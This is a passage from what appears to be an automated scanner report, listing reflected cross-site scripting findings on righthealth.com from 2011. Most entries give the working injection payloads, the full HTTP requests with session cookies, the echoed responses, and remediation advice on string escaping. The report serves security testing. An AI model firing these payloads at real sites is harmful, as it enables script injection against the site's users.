Host:   http://www.righthealth.com
Path:   /images/health/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37928"><img%20src%3da%20onerror%3dalert(1)>5d6aa7d5381 was submitted in the REST URL parameter 3. This input was echoed as 37928"><img src=a onerror=alert(1)>5d6aa7d5381 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /images/health/favicon.ico37928"><img%20src%3da%20onerror%3dalert(1)>5d6aa7d5381 HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; last_referrer=; __utmz=168930850.1305489674.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=168930850.799214937.1305489674.1305489674.1305489674.1; __utmc=168930850; __utmb=168930850.1.10.1305489674; __qca=P0-481111707-1305489677084; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:12:02 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=images; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:12:02 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:27:02 GMT;path=/
Content-Length: 20573

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<meta name="title" content="Health favicon.ico37928"><img src=a onerror=alert(1)>5d6aa7d5381" />
...[SNIP]...

4.47. http://www.righthealth.com/javascripts/cache/options_bottom-righthealth-sem-chimborazo-153574.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.righthealth.com
Path:   /javascripts/cache/options_bottom-righthealth-sem-chimborazo-153574.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f07a1"><img%20src%3da%20onerror%3dalert(1)>753635fa670 was submitted in the REST URL parameter 2. This input was echoed as f07a1"><img src=a onerror=alert(1)>753635fa670 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /javascripts/f07a1"><img%20src%3da%20onerror%3dalert(1)>753635fa670/options_bottom-righthealth-sem-chimborazo-153574.js?1305315777 HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:07:26 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=javascripts; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:07:26 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:22:26 GMT;path=/
Content-Length: 21139

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<meta name="title" content="F07a1"><img Src=a Onerror=alert(1)>753635fa670 options_bottom righthealth sem chimborazo 153574.js" />
...[SNIP]...

4.48. http://www.righthealth.com/javascripts/cache/options_bottom-righthealth-sem-chimborazo-153574.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.righthealth.com
Path:   /javascripts/cache/options_bottom-righthealth-sem-chimborazo-153574.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1142\"%3b76e560c0324 was submitted in the REST URL parameter 2. This input was echoed as e1142\\";76e560c0324 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /javascripts/e1142\"%3b76e560c0324/options_bottom-righthealth-sem-chimborazo-153574.js?1305315777 HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:07:29 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=javascripts; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:07:29 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:22:29 GMT;path=/
Content-Length: 20855

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<script type="text/javascript">
   var kl = kapp.log;
   window.document.kl = kl;
   kl.session_name = "kid";
   kl.session_id = "ffeeb640-615b-012e-af22-003048fe49ee";
   kl.svid = "1574392605";
   kl.query = "E1142\\";76e560c0324";
   kl.source = kapp.traffic.source();
   kl.subsource = kapp.traffic.subSource();
   kl.coordinate_anchor_id = "header";
   kl.http_referrer = "http://www.righthealth.com/";
   kl.build_id = '153574';
   kl.rel
...[SNIP]...

4.49. http://www.righthealth.com/javascripts/cache/topic_bottom-righthealth-sem-chimborazo-153574.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.righthealth.com
Path:   /javascripts/cache/topic_bottom-righthealth-sem-chimborazo-153574.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcab7"><script>alert(1)</script>37d1f3bab78 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /javascriptsdcab7"><script>alert(1)</script>37d1f3bab78/cache/topic_bottom-righthealth-sem-chimborazo-153574.js?1305315777 HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:07:58 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=javascriptsdcab7%22%3E%3Cscript%3Ealert%281%29%3C; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:07:58 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:22:58 GMT;path=/
Content-Length: 20845

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<link rel="canonical" href="http://www.righthealth.com/javascriptsdcab7"><script>alert(1)</script>37d1f3bab78/cache/topic_bottom-righthealth-sem-chimborazo-153574.js"/>
...[SNIP]...

4.50. http://www.righthealth.com/javascripts/cache/topic_bottom-righthealth-sem-chimborazo-153574.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.righthealth.com
Path:   /javascripts/cache/topic_bottom-righthealth-sem-chimborazo-153574.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3e12"><img%20src%3da%20onerror%3dalert(1)>9506abee47d was submitted in the REST URL parameter 2. This input was echoed as b3e12"><img src=a onerror=alert(1)>9506abee47d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /javascripts/b3e12"><img%20src%3da%20onerror%3dalert(1)>9506abee47d/topic_bottom-righthealth-sem-chimborazo-153574.js?1305315777 HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:08:27 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=javascripts; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:08:27 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:23:27 GMT;path=/
Content-Length: 21124

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<meta name="title" content="B3e12"><img Src=a Onerror=alert(1)>9506abee47d topic_bottom righthealth sem chimborazo 153574.js" />
...[SNIP]...

4.51. http://www.righthealth.com/javascripts/cache/topic_bottom-righthealth-sem-chimborazo-153574.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.righthealth.com
Path:   /javascripts/cache/topic_bottom-righthealth-sem-chimborazo-153574.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 794a0\"%3b7d773a0b224 was submitted in the REST URL parameter 2. This input was echoed as 794a0\\";7d773a0b224 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /javascripts/794a0\"%3b7d773a0b224/topic_bottom-righthealth-sem-chimborazo-153574.js?1305315777 HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:08:29 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=javascripts; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:08:29 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:23:29 GMT;path=/
Content-Length: 20840

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<script type="text/javascript">
   var kl = kapp.log;
   window.document.kl = kl;
   kl.session_name = "kid";
   kl.session_id = "ffeeb640-615b-012e-af22-003048fe49ee";
   kl.svid = "749663975";
   kl.query = "794a0\\";7d773a0b224";
   kl.source = kapp.traffic.source();
   kl.subsource = kapp.traffic.subSource();
   kl.coordinate_anchor_id = "header";
   kl.http_referrer = "http://www.righthealth.com/";
   kl.build_id = '153574';
   kl.rel
...[SNIP]...

4.52. http://www.righthealth.com/javascripts/cache/topic_bottom_homepage-righthealth-sem-chimborazo-153574.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.righthealth.com
Path:   /javascripts/cache/topic_bottom_homepage-righthealth-sem-chimborazo-153574.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8987"><img%20src%3da%20onerror%3dalert(1)>3eae1b6f947 was submitted in the REST URL parameter 2. This input was echoed as f8987"><img src=a onerror=alert(1)>3eae1b6f947 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /javascripts/f8987"><img%20src%3da%20onerror%3dalert(1)>3eae1b6f947/topic_bottom_homepage-righthealth-sem-chimborazo-153574.js?1305315846 HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:07:03 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=javascripts; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:07:03 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:22:03 GMT;path=/
Content-Length: 21188

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<meta name="title" content="F8987"><img Src=a Onerror=alert(1)>3eae1b6f947 topic_bottom_homepage righthealth sem chimborazo 153574.js" />
...[SNIP]...

4.53. http://www.righthealth.com/javascripts/cache/topic_bottom_homepage-righthealth-sem-chimborazo-153574.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.righthealth.com
Path:   /javascripts/cache/topic_bottom_homepage-righthealth-sem-chimborazo-153574.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51863\"%3b251d366298 was submitted in the REST URL parameter 2. This input was echoed as 51863\\";251d366298 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /javascripts/51863\"%3b251d366298/topic_bottom_homepage-righthealth-sem-chimborazo-153574.js?1305315846 HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:07:05 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=javascripts; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:07:05 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:22:05 GMT;path=/
Content-Length: 20895

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<script type="text/javascript">
   var kl = kapp.log;
   window.document.kl = kl;
   kl.session_name = "kid";
   kl.session_id = "ffeeb640-615b-012e-af22-003048fe49ee";
   kl.svid = "1466212046";
   kl.query = "51863\\";251d366298";
   kl.source = kapp.traffic.source();
   kl.subsource = kapp.traffic.subSource();
   kl.coordinate_anchor_id = "header";
   kl.http_referrer = "http://www.righthealth.com/";
   kl.build_id = '153574';
   kl.rel
...[SNIP]...

4.54. http://www.righthealth.com/javascripts/cache/topic_top-s_righthealth-chimborazo-153574.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.righthealth.com
Path:   /javascripts/cache/topic_top-s_righthealth-chimborazo-153574.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e560\"%3b94424d31d72 was submitted in the REST URL parameter 2. This input was echoed as 6e560\\";94424d31d72 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /javascripts/6e560\"%3b94424d31d72/topic_top-s_righthealth-chimborazo-153574.js?1305315776 HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:07:07 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=javascripts; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:07:07 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:22:07 GMT;path=/
Content-Length: 20806

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<script type="text/javascript">
   var kl = kapp.log;
   window.document.kl = kl;
   kl.session_name = "kid";
   kl.session_id = "ffeeb640-615b-012e-af22-003048fe49ee";
   kl.svid = "1761041272";
   kl.query = "6e560\\";94424d31d72";
   kl.source = kapp.traffic.source();
   kl.subsource = kapp.traffic.subSource();
   kl.coordinate_anchor_id = "header";
   kl.http_referrer = "http://www.righthealth.com/";
   kl.build_id = '153574';
   kl.rel
...[SNIP]...

4.55. http://www.righthealth.com/javascripts/cache/topic_top-s_righthealth-chimborazo-153574.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.righthealth.com
Path:   /javascripts/cache/topic_top-s_righthealth-chimborazo-153574.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd5c2"><img%20src%3da%20onerror%3dalert(1)>8d285d61078 was submitted in the REST URL parameter 2. This input was echoed as dd5c2"><img src=a onerror=alert(1)>8d285d61078 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /javascripts/dd5c2"><img%20src%3da%20onerror%3dalert(1)>8d285d61078/topic_top-s_righthealth-chimborazo-153574.js?1305315776 HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:07:05 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=javascripts; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:07:05 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:22:05 GMT;path=/
Content-Length: 21090

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<meta name="title" content="Dd5c2"><img Src=a Onerror=alert(1)>8d285d61078 topic_top s_righthealth chimborazo 153574.js" />
...[SNIP]...

4.56. http://www.righthealth.com/stylesheets/cache/topic-s_righthealth-chimborazo-153574.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.righthealth.com
Path:   /stylesheets/cache/topic-s_righthealth-chimborazo-153574.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8fd0"><img%20src%3da%20onerror%3dalert(1)>9308dcd9410 was submitted in the REST URL parameter 2. This input was echoed as b8fd0"><img src=a onerror=alert(1)>9308dcd9410 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /stylesheets/b8fd0"><img%20src%3da%20onerror%3dalert(1)>9308dcd9410/topic-s_righthealth-chimborazo-153574.css?1305489648 HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:07:19 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=stylesheets; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:07:19 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:22:19 GMT;path=/
Content-Length: 21068

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<meta name="title" content="B8fd0"><img Src=a Onerror=alert(1)>9308dcd9410 topic s_righthealth chimborazo 153574.css" />
...[SNIP]...

4.57. http://www.righthealth.com/stylesheets/cache/topic-s_righthealth-chimborazo-153574.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.righthealth.com
